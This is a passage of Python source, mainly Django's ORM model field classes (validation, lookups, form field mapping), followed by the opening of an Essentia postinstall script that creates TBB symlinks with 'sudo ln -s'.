self.null = True
self.rel = rel
self.default = default
self.editable = editable
self.serialize = serialize
self.unique_for_date, self.unique_for_month = (unique_for_date,
unique_for_month)
self.unique_for_year = unique_for_year
self._choices = choices or []
self.help_text = help_text
self.db_column = db_column
self.db_tablespace = db_tablespace or settings.DEFAULT_INDEX_TABLESPACE
self.auto_created = auto_created
# Set db_index to True if the field has a relationship and doesn't
# explicitly set db_index.
self.db_index = db_index
# Adjust the appropriate creation counter, and save our local copy.
if auto_created:
self.creation_counter = Field.auto_creation_counter
Field.auto_creation_counter -= 1
else:
self.creation_counter = Field.creation_counter
Field.creation_counter += 1
self.validators = self.default_validators + validators
messages = {}
for c in reversed(self.__class__.__mro__):
messages.update(getattr(c, 'default_error_messages', {}))
messages.update(error_messages or {})
self.error_messages = messages
def __cmp__(self, other):
# This is needed because bisect does not take a comparison function.
return cmp(self.creation_counter, other.creation_counter)
def __deepcopy__(self, memodict):
# We don't have to deepcopy very much here, since most things are not
# intended to be altered after initial creation.
obj = copy.copy(self)
if self.rel:
obj.rel = copy.copy(self.rel)
memodict[id(self)] = obj
return obj
def to_python(self, value):
"""
Converts the input value into the expected Python data type, raising
django.core.exceptions.ValidationError if the data can't be converted.
Returns the converted value. Subclasses should override this.
"""
return value
def run_validators(self, value):
if value in validators.EMPTY_VALUES:
return
errors = []
for v in self.validators:
try:
v(value)
except exceptions.ValidationError, e:
if hasattr(e, 'code') and e.code in self.error_messages:
message = self.error_messages[e.code]
if e.params:
message = message % e.params
errors.append(message)
else:
errors.extend(e.messages)
if errors:
raise exceptions.ValidationError(errors)
def validate(self, value, model_instance):
"""
Validates value and throws ValidationError. Subclasses should override
this to provide validation logic.
"""
if not self.editable:
# Skip validation for non-editable fields.
return
if self._choices and value:
for option_key, option_value in self.choices:
if isinstance(option_value, (list, tuple)):
# This is an optgroup, so look inside the group for
# options.
for optgroup_key, optgroup_value in option_value:
if value == optgroup_key:
return
elif value == option_key:
return
msg = self.error_messages['invalid_choice'] % value
raise exceptions.ValidationError(msg)
if value is None and not self.null:
raise exceptions.ValidationError(self.error_messages['null'])
if not self.blank and value in validators.EMPTY_VALUES:
raise exceptions.ValidationError(self.error_messages['blank'])
def clean(self, value, model_instance):
"""
Convert the value's type and run validation. Validation errors
from to_python and validate are propagated. The correct value is
returned if no error is raised.
"""
value = self.to_python(value)
self.validate(value, model_instance)
self.run_validators(value)
return value
def db_type(self, connection):
"""
Returns the database column data type for this field, for the provided
connection.
"""
# The default implementation of this method looks at the
# backend-specific DATA_TYPES dictionary, looking up the field by its
# "internal type".
#
# A Field class can implement the get_internal_type() method to specify
# which *preexisting* Django Field class it's most similar to -- i.e.,
# a custom field might be represented by a TEXT column type, which is
# the same as the TextField Django field type, which means the custom
# field's get_internal_type() returns 'TextField'.
#
# But the limitation of the get_internal_type() / data_types approach
# is that it cannot handle database column types that aren't already
# mapped to one of the built-in Django field types. In this case, you
# can implement db_type() instead of get_internal_type() to specify
# exactly which wacky database column type you want to use.
data = DictWrapper(self.__dict__, connection.ops.quote_name, "qn_")
try:
return (connection.creation.data_types[self.get_internal_type()]
% data)
except KeyError:
return None
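    # A minimal sketch of the two approaches described above (illustrative
    # only; these example classes are not part of Django). A field can reuse a
    # built-in column mapping via get_internal_type(), or emit a column type
    # directly via db_type():
    #
    #     class LongLabelField(Field):
    #         def get_internal_type(self):
    #             return "TextField"      # reuse TextField's mapped column type
    #
    #     class HandField(Field):
    #         def db_type(self, connection):
    #             return "char(104)"      # use this column type verbatim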
@property
def unique(self):
return self._unique or self.primary_key
def set_attributes_from_name(self, name):
if not self.name:
self.name = name
self.attname, self.column = self.get_attname_column()
if self.verbose_name is None and self.name:
self.verbose_name = self.name.replace('_', ' ')
def contribute_to_class(self, cls, name):
self.set_attributes_from_name(name)
self.model = cls
cls._meta.add_field(self)
if self.choices:
setattr(cls, 'get_%s_display' % self.name,
curry(cls._get_FIELD_display, field=self))
def get_attname(self):
return self.name
def get_attname_column(self):
attname = self.get_attname()
column = self.db_column or attname
return attname, column
def get_cache_name(self):
return '_%s_cache' % self.name
def get_internal_type(self):
return self.__class__.__name__
def pre_save(self, model_instance, add):
"""
Returns field's value just before saving.
"""
return getattr(model_instance, self.attname)
def get_prep_value(self, value):
"""
Perform preliminary non-db specific value checks and conversions.
"""
return value
def get_db_prep_value(self, value, connection, prepared=False):
"""Returns field's value prepared for interacting with the database
backend.
        Used by the default implementations of ``get_db_prep_save`` and
        ``get_db_prep_lookup``.
"""
if not prepared:
value = self.get_prep_value(value)
return value
def get_db_prep_save(self, value, connection):
"""
Returns field's value prepared for saving into a database.
"""
return self.get_db_prep_value(value, connection=connection,
prepared=False)
def get_prep_lookup(self, lookup_type, value):
"""
Perform preliminary non-db specific lookup checks and conversions
"""
if hasattr(value, 'prepare'):
return value.prepare()
if hasattr(value, '_prepare'):
return value._prepare()
if lookup_type in (
'regex', 'iregex', 'month', 'day', 'week_day', 'search',
'contains', 'icontains', 'iexact', 'startswith', 'istartswith',
'endswith', 'iendswith', 'isnull'
):
return value
elif lookup_type in ('exact', 'gt', 'gte', 'lt', 'lte'):
return self.get_prep_value(value)
elif lookup_type in ('range', 'in'):
return [self.get_prep_value(v) for v in value]
elif lookup_type == 'year':
try:
return int(value)
except ValueError:
raise ValueError("The __year lookup type requires an integer "
"argument")
raise TypeError("Field has invalid lookup: %s" % lookup_type)
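    # Illustrative results for the base Field above (a sketch, not part of the
    # original source):
    #
    #     f.get_prep_lookup('iexact', 'abc')   -> 'abc' (passed through as-is)
    #     f.get_prep_lookup('exact', 42)       -> f.get_prep_value(42)
    #     f.get_prep_lookup('in', [1, 2])      -> [f.get_prep_value(1),
    #                                              f.get_prep_value(2)]
    #     f.get_prep_lookup('year', '2012')    -> 2012
    #     f.get_prep_lookup('bogus', 1)        -> raises TypeError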
def get_db_prep_lookup(self, lookup_type, value, connection,
prepared=False):
"""
Returns field's value prepared for database lookup.
"""
if not prepared:
value = self.get_prep_lookup(lookup_type, value)
if hasattr(value, 'get_compiler'):
value = value.get_compiler(connection=connection)
if hasattr(value, 'as_sql') or hasattr(value, '_as_sql'):
# If the value has a relabel_aliases method, it will need to
# be invoked before the final SQL is evaluated
if hasattr(value, 'relabel_aliases'):
return value
if hasattr(value, 'as_sql'):
sql, params = value.as_sql()
else:
sql, params = value._as_sql(connection=connection)
return QueryWrapper(('(%s)' % sql), params)
if lookup_type in ('regex', 'iregex', 'month', 'day', 'week_day',
'search'):
return [value]
elif lookup_type in ('exact', 'gt', 'gte', 'lt', 'lte'):
return [self.get_db_prep_value(value, connection=connection,
prepared=prepared)]
elif lookup_type in ('range', 'in'):
return [self.get_db_prep_value(v, connection=connection,
prepared=prepared) for v in value]
elif lookup_type in ('contains', 'icontains'):
return ["%%%s%%" % connection.ops.prep_for_like_query(value)]
elif lookup_type == 'iexact':
return [connection.ops.prep_for_iexact_query(value)]
elif lookup_type in ('startswith', 'istartswith'):
return ["%s%%" % connection.ops.prep_for_like_query(value)]
elif lookup_type in ('endswith', 'iendswith'):
return ["%%%s" % connection.ops.prep_for_like_query(value)]
elif lookup_type == 'isnull':
return []
elif lookup_type == 'year':
if self.get_internal_type() == 'DateField':
return connection.ops.year_lookup_bounds_for_date_field(value)
else:
return connection.ops.year_lookup_bounds(value)
def has_default(self):
"""
Returns a boolean of whether this field has a default value.
"""
return self.default is not NOT_PROVIDED
def get_default(self):
"""
Returns the default value for this field.
"""
if self.has_default():
if callable(self.default):
return self.default()
return force_unicode(self.default, strings_only=True)
if (not self.empty_strings_allowed or (self.null and
not connection.features.interprets_empty_strings_as_nulls)):
return None
return ""
def get_validator_unique_lookup_type(self):
return '%s__exact' % self.name
def get_choices(self, include_blank=True, blank_choice=BLANK_CHOICE_DASH):
"""Returns choices with a default blank choices included, for use
as SelectField choices for this field."""
first_choice = include_blank and blank_choice or []
if self.choices:
return first_choice + list(self.choices)
rel_model = self.rel.to
if hasattr(self.rel, 'get_related_field'):
lst = [(getattr(x, self.rel.get_related_field().attname),
smart_unicode(x))
for x in rel_model._default_manager.complex_filter(
self.rel.limit_choices_to)]
else:
lst = [(x._get_pk_val(), smart_unicode(x))
for x in rel_model._default_manager.complex_filter(
self.rel.limit_choices_to)]
return first_choice + lst
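    # Illustrative result of get_choices() above (a sketch, not part of the
    # original source) for a field declared with
    # choices=[('S', 'Small'), ('L', 'Large')]:
    #
    #     field.get_choices()
    #     -> [('', '---------'), ('S', 'Small'), ('L', 'Large')]
    #     field.get_choices(include_blank=False)
    #     -> [('S', 'Small'), ('L', 'Large')]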
def get_choices_default(self):
return self.get_choices()
def get_flatchoices(self, include_blank=True,
blank_choice=BLANK_CHOICE_DASH):
"""
Returns flattened choices with a default blank choice included.
"""
first_choice = include_blank and blank_choice or []
return first_choice + list(self.flatchoices)
def _get_val_from_obj(self, obj):
if obj is not None:
return getattr(obj, self.attname)
else:
return self.get_default()
def value_to_string(self, obj):
"""
Returns a string value of this field from the passed obj.
This is used by the serialization framework.
"""
return smart_unicode(self._get_val_from_obj(obj))
def bind(self, fieldmapping, original, bound_field_class):
return bound_field_class(self, fieldmapping, original)
def _get_choices(self):
if hasattr(self._choices, 'next'):
choices, self._choices = tee(self._choices)
return choices
else:
return self._choices
choices = property(_get_choices)
def _get_flatchoices(self):
"""Flattened version of choices tuple."""
flat = []
for choice, value in self.choices:
if isinstance(value, (list, tuple)):
flat.extend(value)
else:
flat.append((choice,value))
return flat
flatchoices = property(_get_flatchoices)
def save_form_data(self, instance, data):
setattr(instance, self.name, data)
def formfield(self, form_class=forms.CharField, **kwargs):
"""
Returns a django.forms.Field instance for this database Field.
"""
defaults = {'required': not self.blank,
'label': capfirst(self.verbose_name),
'help_text': self.help_text}
if self.has_default():
if callable(self.default):
defaults['initial'] = self.default
defaults['show_hidden_initial'] = True
else:
defaults['initial'] = self.get_default()
if self.choices:
# Fields with choices get special treatment.
include_blank = (self.blank or
not (self.has_default() or 'initial' in kwargs))
defaults['choices'] = self.get_choices(include_blank=include_blank)
defaults['coerce'] = self.to_python
if self.null:
defaults['empty_value'] = None
form_class = forms.TypedChoiceField
# Many of the subclass-specific formfield arguments (min_value,
# max_value) don't apply for choice fields, so be sure to only pass
# the values that TypedChoiceField will understand.
for k in kwargs.keys():
if k not in ('coerce', 'empty_value', 'choices', 'required',
'widget', 'label', 'initial', 'help_text',
'error_messages', 'show_hidden_initial'):
del kwargs[k]
defaults.update(kwargs)
return form_class(**defaults)
def value_from_object(self, obj):
"""
Returns the value of this field in the given model instance.
"""
return getattr(obj, self.attname)
def __repr__(self):
"""
Displays the module, class and name of the field.
"""
path = '%s.%s' % (self.__class__.__module__, self.__class__.__name__)
name = getattr(self, 'name', None)
if name is not None:
return '<%s: %s>' % (path, name)
return '<%s>' % path
class AutoField(Field):
description = _("Integer")
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value must be an integer."),
}
def __init__(self, *args, **kwargs):
assert kwargs.get('primary_key', False) is True, \
"%ss must have primary_key=True." % self.__class__.__name__
kwargs['blank'] = True
Field.__init__(self, *args, **kwargs)
def get_internal_type(self):
return "AutoField"
def to_python(self, value):
if value is None:
return value
try:
return int(value)
except (TypeError, ValueError):
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def validate(self, value, model_instance):
pass
def get_prep_value(self, value):
if value is None:
return None
return int(value)
def contribute_to_class(self, cls, name):
assert not cls._meta.has_auto_field, \
"A model can't have more than one AutoField."
super(AutoField, self).contribute_to_class(cls, name)
cls._meta.has_auto_field = True
cls._meta.auto_field = self
def formfield(self, **kwargs):
return None
class BooleanField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value must be either True or False."),
}
description = _("Boolean (Either True or False)")
def __init__(self, *args, **kwargs):
kwargs['blank'] = True
if 'default' not in kwargs and not kwargs.get('null'):
kwargs['default'] = False
Field.__init__(self, *args, **kwargs)
def get_internal_type(self):
return "BooleanField"
def to_python(self, value):
if value in (True, False):
            # if value is 1 or 0 then it's equal to True or False, but we want
# to return a true bool for semantic reasons.
return bool(value)
if value in ('t', 'True', '1'):
return True
if value in ('f', 'False', '0'):
return False
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def get_prep_lookup(self, lookup_type, value):
# Special-case handling for filters coming from a Web request (e.g. the
# admin interface). Only works for scalar values (not lists). If you're
# passing in a list, you might as well make things the right type when
# constructing the list.
if value in ('1', '0'):
value = bool(int(value))
return super(BooleanField, self).get_prep_lookup(lookup_type, value)
def get_prep_value(self, value):
if value is None:
return None
return bool(value)
def formfield(self, **kwargs):
# Unlike most fields, BooleanField figures out include_blank from
# self.null instead of self.blank.
if self.choices:
include_blank = (self.null or
not (self.has_default() or 'initial' in kwargs))
defaults = {'choices': self.get_choices(
include_blank=include_blank)}
else:
defaults = {'form_class': forms.BooleanField}
defaults.update(kwargs)
return super(BooleanField, self).formfield(**defaults)
class CharField(Field):
description = _("String (up to %(max_length)s)")
def __init__(self, *args, **kwargs):
super(CharField, self).__init__(*args, **kwargs)
self.validators.append(validators.MaxLengthValidator(self.max_length))
def get_internal_type(self):
return "CharField"
def to_python(self, value):
if isinstance(value, basestring) or value is None:
return value
return smart_unicode(value)
def get_prep_value(self, value):
return self.to_python(value)
def formfield(self, **kwargs):
# Passing max_length to forms.CharField means that the value's length
# will be validated twice. This is considered acceptable since we want
# the value in the form field (to pass into widget for example).
defaults = {'max_length': self.max_length}
defaults.update(kwargs)
return super(CharField, self).formfield(**defaults)
# TODO: Maybe move this into contrib, because it's specialized.
class CommaSeparatedIntegerField(CharField):
default_validators = [validators.validate_comma_separated_integer_list]
description = _("Comma-separated integers")
def formfield(self, **kwargs):
defaults = {
'error_messages': {
'invalid': _(u'Enter only digits separated by commas.'),
}
}
defaults.update(kwargs)
return super(CommaSeparatedIntegerField, self).formfield(**defaults)
class DateField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value has an invalid date format. It must be "
u"in YYYY-MM-DD format."),
'invalid_date': _(u"'%s' value has the correct format (YYYY-MM-DD) "
u"but it is an invalid date."),
}
description = _("Date (without time)")
def __init__(self, verbose_name=None, name=None, auto_now=False,
auto_now_add=False, **kwargs):
self.auto_now, self.auto_now_add = auto_now, auto_now_add
if auto_now or auto_now_add:
kwargs['editable'] = False
kwargs['blank'] = True
Field.__init__(self, verbose_name, name, **kwargs)
def get_internal_type(self):
return "DateField"
def to_python(self, value):
if value is None:
return value
if isinstance(value, datetime.datetime):
return value.date()
if isinstance(value, datetime.date):
return value
value = smart_str(value)
try:
parsed = parse_date(value)
if parsed is not None:
return parsed
except ValueError:
msg = self.error_messages['invalid_date'] % value
raise exceptions.ValidationError(msg)
msg = self.error_messages['invalid'] % value
raise exceptions.ValidationError(msg)
def pre_save(self, model_instance, add):
if self.auto_now or (self.auto_now_add and add):
value = datetime.date.today()
setattr(model_instance, self.attname, value)
return value
else:
return super(DateField, self).pre_save(model_instance, add)
def contribute_to_class(self, cls, name):
super(DateField,self).contribute_to_class(cls, name)
if not self.null:
setattr(cls, 'get_next_by_%s' % self.name,
curry(cls._get_next_or_previous_by_FIELD, field=self,
is_next=True))
setattr(cls, 'get_previous_by_%s' % self.name,
curry(cls._get_next_or_previous_by_FIELD, field=self,
is_next=False))
def get_prep_lookup(self, lookup_type, value):
# For "__month", "__day", and "__week_day" lookups, convert the value
# to an int so the database backend always sees a consistent type.
if lookup_type in ('month', 'day', 'week_day'):
return int(value)
return super(DateField, self).get_prep_lookup(lookup_type, value)
def get_prep_value(self, value):
return self.to_python(value)
def get_db_prep_value(self, value, connection, prepared=False):
# Casts dates into the format expected by the backend
if not prepared:
value = self.get_prep_value(value)
return connection.ops.value_to_db_date(value)
def value_to_string(self, obj):
val = self._get_val_from_obj(obj)
return '' if val is None else val.isoformat()
def formfield(self, **kwargs):
defaults = {'form_class': forms.DateField}
defaults.update(kwargs)
return super(DateField, self).formfield(**defaults)
class DateTimeField(DateField):
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value has an invalid format. It must be in "
u"YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ] format."),
'invalid_date': _(u"'%s' value has the correct format "
u"(YYYY-MM-DD) but it is an invalid date."),
'invalid_datetime': _(u"'%s' value has the correct format "
u"(YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]) "
u"but it is an invalid date/time."),
}
description = _("Date (with time)")
# __init__ is inherited from DateField
def get_internal_type(self):
return "DateTimeField"
def to_python(self, value):
if value is None:
return value
if isinstance(value, datetime.datetime):
return value
if isinstance(value, datetime.date):
value = datetime.datetime(value.year, value.month, value.day)
if settings.USE_TZ:
# For backwards compatibility, interpret naive datetimes in
# local time. This won't work during DST change, but we can't
# do much about it, so we let the exceptions percolate up the
# call stack.
warnings.warn(u"DateTimeField received a naive datetime (%s)"
u" while time zone support is active." % value,
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
return value
value = smart_str(value)
try:
parsed = parse_datetime(value)
if parsed is not None:
return parsed
except ValueError:
msg = self.error_messages['invalid_datetime'] % value
raise exceptions.ValidationError(msg)
try:
parsed = parse_date(value)
if parsed is not None:
return datetime.datetime(parsed.year, parsed.month, parsed.day)
except ValueError:
msg = self.error_messages['invalid_date'] % value
raise exceptions.ValidationError(msg)
msg = self.error_messages['invalid'] % value
raise exceptions.ValidationError(msg)
def pre_save(self, model_instance, add):
if self.auto_now or (self.auto_now_add and add):
value = timezone.now()
setattr(model_instance, self.attname, value)
return value
else:
return super(DateTimeField, self).pre_save(model_instance, add)
# contribute_to_class is inherited from DateField, it registers
# get_next_by_FOO and get_prev_by_FOO
# get_prep_lookup is inherited from DateField
def get_prep_value(self, value):
value = self.to_python(value)
if value is not None and settings.USE_TZ and timezone.is_naive(value):
# For backwards compatibility, interpret naive datetimes in local
# time. This won't work during DST change, but we can't do much
# about it, so we let the exceptions percolate up the call stack.
warnings.warn(u"DateTimeField received a naive datetime (%s)"
u" while time zone support is active." % value,
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
return value
def get_db_prep_value(self, value, connection, prepared=False):
# Casts datetimes into the format expected by the backend
if not prepared:
value = self.get_prep_value(value)
return connection.ops.value_to_db_datetime(value)
def value_to_string(self, obj):
val = self._get_val_from_obj(obj)
return '' if val is None else val.isoformat()
def formfield(self, **kwargs):
defaults = {'form_class': forms.DateTimeField}
defaults.update(kwargs)
return super(DateTimeField, self).formfield(**defaults)
class DecimalField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value must be a decimal number."),
}
description = _("Decimal number")
def __init__(self, verbose_name=None, name=None, max_digits=None,
decimal_places=None, **kwargs):
self.max_digits, self.decimal_places = max_digits, decimal_places
Field.__init__(self, verbose_name, name, **kwargs)
def get_internal_type(self):
return "DecimalField"
def to_python(self, value):
if value is None:
return value
try:
return decimal.Decimal(value)
except decimal.InvalidOperation:
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def _format(self, value):
if isinstance(value, basestring) or value is None:
return value
else:
return self.format_number(value)
def format_number(self, value):
"""
Formats a number into a string with the requisite number of digits and
decimal places.
"""
# Method moved to django.db.backends.util.
#
# It is preserved because it is used by the oracle backend
# (django.db.backends.oracle.query), and also for
# backwards-compatibility with any external code which may have used
# this method.
from django.db.backends import util
return util.format_number(value, self.max_digits, self.decimal_places)
def get_db_prep_save(self, value, connection):
return connection.ops.value_to_db_decimal(self.to_python(value),
self.max_digits, self.decimal_places)
def get_prep_value(self, value):
return self.to_python(value)
def formfield(self, **kwargs):
defaults = {
'max_digits': self.max_digits,
'decimal_places': self.decimal_places,
'form_class': forms.DecimalField,
}
defaults.update(kwargs)
return super(DecimalField, self).formfield(**defaults)
class EmailField(CharField):
default_validators = [validators.validate_email]
description = _("E-mail address")
def __init__(self, *args, **kwargs):
kwargs['max_length'] = kwargs.get('max_length', 75)
CharField.__init__(self, *args, **kwargs)
def formfield(self, **kwargs):
# As with CharField, this will cause email validation to be performed
# twice.
defaults = {
'form_class': forms.EmailField,
}
defaults.update(kwargs)
return super(EmailField, self).formfield(**defaults)
class FilePathField(Field):
description = _("File path")
def __init__(self, verbose_name=None, name=None, path='', match=None,
recursive=False, **kwargs):
self.path, self.match, self.recursive = path, match, recursive
kwargs['max_length'] = kwargs.get('max_length', 100)
Field.__init__(self, verbose_name, name, **kwargs)
def get_prep_value(self, value):
value = super(FilePathField, self).get_prep_value(value)
if value is None:
return None
return smart_unicode(value)
def formfield(self, **kwargs):
defaults = {
'path': self.path,
'match': self.match,
'recursive': self.recursive,
'form_class': forms.FilePathField,
}
defaults.update(kwargs)
return super(FilePathField, self).formfield(**defaults)
def get_internal_type(self):
return "FilePathField"
class FloatField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%s' value must be a float."),
}
description = _("Floating point number")
def get_prep_value(self, value):
if value is None:
return None
return float(value)
def get_internal_type(self):
return "FloatField"
def to_python(self, value):
if value is None:
return value
try:
return float(value)
except (TypeError, ValueError):
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def formfield(self, **kwargs):
defaults = {'form_class': forms.FloatField}
defaults.update(kwargs)
return super(FloatField, self).formfield(**defaults)
class IntegerField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%s' value must be an integer."),
}
description = _("Integer")
def get_prep_value(self, value):
if value is None:
return None
return int(value)
def get_prep_lookup(self, lookup_type, value):
if ((lookup_type == 'gte' or lookup_type == 'lt')
and isinstance(value, float)):
value = math.ceil(value)
return super(IntegerField, self).get_prep_lookup(lookup_type, value)
def get_internal_type(self):
return "IntegerField"
def to_python(self, value):
if value is None:
return value
try:
return int(value)
except (TypeError, ValueError):
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def formfield(self, **kwargs):
defaults = {'form_class': forms.IntegerField}
defaults.update(kwargs)
return super(IntegerField, self).formfield(**defaults)
class BigIntegerField(IntegerField):
empty_strings_allowed = False
description = _("Big (8 byte) integer")
MAX_BIGINT = 9223372036854775807
def get_internal_type(self):
return "BigIntegerField"
def formfield(self, **kwargs):
defaults = {'min_value': -BigIntegerField.MAX_BIGINT - 1,
'max_value': BigIntegerField.MAX_BIGINT}
defaults.update(kwargs)
return super(BigIntegerField, self).formfield(**defaults)
class IPAddressField(Field):
empty_strings_allowed = False
description = _("IPv4 address")
def __init__(self, *args, **kwargs):
kwargs['max_length'] = 15
Field.__init__(self, *args, **kwargs)
def get_prep_value(self, value):
value = super(IPAddressField, self).get_prep_value(value)
if value is None:
return None
return smart_unicode(value)
def get_internal_type(self):
return "IPAddressField"
def formfield(self, **kwargs):
defaults = {'form_class': forms.IPAddressField}
defaults.update(kwargs)
return super(IPAddressField, self).formfield(**defaults)
class GenericIPAddressField(Field):
empty_strings_allowed = True
description = _("IP address")
default_error_messages = {}
def __init__(self, verbose_name=None, name=None, protocol='both',
unpack_ipv4=False, *args, **kwargs):
self.unpack_ipv4 = unpack_ipv4
self.default_validators, invalid_error_message = \
validators.ip_address_validators(protocol, unpack_ipv4)
self.default_error_messages['invalid'] = invalid_error_message
kwargs['max_length'] = 39
Field.__init__(self, verbose_name, name, *args, **kwargs)
def get_internal_type(self):
return "GenericIPAddressField"
def to_python(self, value):
if value and ':' in value:
return clean_ipv6_address(value,
self.unpack_ipv4, self.error_messages['invalid'])
return value
def get_db_prep_value(self, value, connection, prepared=False):
if not prepared:
value = self.get_prep_value(value)
return value or None
def get_prep_value(self, value):
if value is None:
return value
if value and ':' in value:
try:
return clean_ipv6_address(value, self.unpack_ipv4)
except exceptions.ValidationError:
pass
return smart_unicode(value)
def formfield(self, **kwargs):
defaults = {'form_class': forms.GenericIPAddressField}
defaults.update(kwargs)
return super(GenericIPAddressField, self).formfield(**defaults)
class NullBooleanField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%s' value must be either None, True or False."),
}
description = _("Boolean (Either True, False or None)")
def __init__(self, *args, **kwargs):
kwargs['null'] = True
kwargs['blank'] = True
Field.__init__(self, *args, **kwargs)
def get_internal_type(self):
return "NullBooleanField"
def to_python(self, value):
if value is None:
return None
if value in (True, False):
return bool(value)
if value in ('None',):
return None
if value in ('t', 'True', '1'):
return True
if value in ('f', 'False', '0'):
return False
msg = self.error_messages['invalid'] % str(value)
raise exceptions.ValidationError(msg)
def get_prep_lookup(self, lookup_type, value):
# Special-case handling for filters coming from a Web request (e.g. the
# admin interface). Only works for scalar values (not lists). If you're
# passing in a list, you might as well make things the right type when
# constructing the list.
if value in ('1', '0'):
value = bool(int(value))
return super(NullBooleanField, self).get_prep_lookup(lookup_type,
value)
def get_prep_value(self, value):
if value is None:
return None
return bool(value)
def formfield(self, **kwargs):
defaults = {
'form_class': forms.NullBooleanField,
'required': not self.blank,
'label': capfirst(self.verbose_name),
'help_text': self.help_text}
defaults.update(kwargs)
return super(NullBooleanField, self).formfield(**defaults)
class PositiveIntegerField(IntegerField):
description = _("Positive integer")
def get_internal_type(self):
return "PositiveIntegerField"
def formfield(self, **kwargs):
defaults = {'min_value': 0}
defaults.update(kwargs)
return super(PositiveIntegerField, self).formfield(**defaults)
class PositiveSmallIntegerField(IntegerField):
description = _("Positive small integer")
def get_internal_type(self):
return "PositiveSmallIntegerField"
def formfield(self, **kwargs):
defaults = {'min_value': 0}
defaults.update(kwargs)
return super(PositiveSmallIntegerField, self).formfield(**defaults)
class SlugField(CharField):
description = _("Slug (up to %(max_length)s)")
def __init__(self, *args, **kwargs):
kwargs['max_length'] = kwargs.get('max_length', 50)
# Set db_index=True unless it's been set manually.
if 'db_index' not in kwargs:
kwargs['db_index'] = True
super(SlugField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "SlugField"
def formfield(self, **kwargs):
defaults = {'form_class': forms.SlugField}
defaults.update(kwargs)
return super(SlugField, self).formfield(**defaults)
class SmallIntegerField(IntegerField):
description = _("Small integer")
def get_internal_type(self):
return "SmallIntegerField"
class TextField(Field):
description = _("Text")
def get_internal_type(self):
return "TextField"
def get_prep_value(self, value):
if isinstance(value, basestring) or value is None:
return value
return smart_unicode(value)
def formfield(self, **kwargs):
defaults = {'widget': forms.Textarea}
defaults.update(kwargs)
return super(TextField, self).formfield(**defaults)
class TimeField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _(u"'%s' value has an invalid format. It must be in "
u"HH:MM[:ss[.uuuuuu]] format."),
'invalid_time': _(u"'%s' value has the correct format "
u"(HH:MM[:ss[.uuuuuu]]) but it is an invalid time."),
}
description = _("Time")
def __init__(self, verbose_name=None, name=None, auto_now=False,
auto_now_add=False, **kwargs):
self.auto_now, self.auto_now_add = auto_now, auto_now_add
if auto_now or auto_now_add:
kwargs['editable'] = False
kwargs['blank'] = True
Field.__init__(self, verbose_name, name, **kwargs)
def get_internal_type(self):
return "TimeField"
def to_python(self, value):
if value is None:
return None
if isinstance(value, datetime.time):
return value
if isinstance(value, datetime.datetime):
# Not usually a good idea to pass in a datetime here (it loses
# information), but this can be a side-effect of interacting with a
# database backend (e.g. Oracle), so we'll be accommodating.
return value.time()
value = smart_str(value)
try:
parsed = parse_time(value)
if parsed is not None:
return parsed
except ValueError:
msg = self.error_messages['invalid_time'] % value
raise exceptions.ValidationError(msg)
msg = self.error_messages['invalid'] % value
raise exceptions.ValidationError(msg)
def pre_save(self, model_instance, add):
if self.auto_now or (self.auto_now_add and add):
value = datetime.datetime.now().time()
setattr(model_instance, self.attname, value)
return value
else:
return super(TimeField, self).pre_save(model_instance, add)
def get_prep_value(self, value):
return self.to_python(value)
def get_db_prep_value(self, value, connection, prepared=False):
# Casts times into the format expected by the backend
if not prepared:
value = self.get_prep_value(value)
return connection.ops.value_to_db_time(value)
def value_to_string(self, obj):
val = self._get_val_from_obj(obj)
return '' if val is None else val.isoformat()
def formfield(self, **kwargs):
defaults = {'form_class': forms.TimeField}
defaults.update(kwargs)
return super(TimeField, self).formfield(**defaults)
class URLField(CharField):
description = _("URL")
def __init__(self, verbose_name=None, name=None, verify_exists=False,
**kwargs):
kwargs['max_length'] = kwargs.get('max_length', 200)
CharField.__init__(self, verbose_name, name, **kwargs)
self.validators.append(
validators.URLValidator(verify_exists=verify_exists))
def formfield(self, **kwargs):
# As with CharField, this will cause URL validation to be performed
# twice.
defaults = {
'form_class': forms.URLField,
}
defaults.update(kwargs)
return super(URLField, self).formfield(**defaults)
| mit |
milrob/essentia | packaging/darwin/extras/tbb_linker.py | 10 | 1971 | #!/usr/bin/env python
# Copyright (C) 2006-2013 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
# this script is used in the postinstall stage to create symbolic links for
# the TBB sources and libraries
import os
essentia_third_party = '/essentia/third_party/'
tbb_mac = essentia_third_party + 'tbb20_020oss_mac/ia32/cc4.0.1_os10.4.9/'
tbb_src = essentia_third_party + 'tbb20_020oss_src/'
def link(source, target):
cmd = 'sudo ln -s' + ' ' + source + ' ' + target
print cmd
    return os.system(cmd)
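# Illustrative expansion of link() above (a sketch, not part of the original
# script): link(tbb_src + 'include/tbb', essentia_third_party + 'include/tbb')
# prints and runs roughly:
#
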